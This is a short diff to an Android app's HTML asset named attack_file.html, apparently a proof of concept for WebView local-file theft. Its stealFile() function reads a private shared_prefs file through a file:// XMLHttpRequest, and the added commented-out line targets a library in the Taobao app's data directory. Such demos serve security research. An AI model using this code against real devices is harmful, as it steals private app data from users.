--- a/app/src/main/assets/html/attack_file.html
+++ b/app/src/main/assets/html/attack_file.html
@@ -4,6 +4,7 @@
 function stealFile()
 {
 	var file = "file:///data/data/com.example.jin.myapplication/shared_prefs/WebViewChromiumPrefs.xml";
+	//var file = "file:///data/data/com.taobao.taobao/lib/libweexjst.so";
 	var xmlHttpReq = new XMLHttpRequest();
 	xmlHttpReq.onreadystatechange = function(){
 		if(xmlHttpReq.readyState == 4){
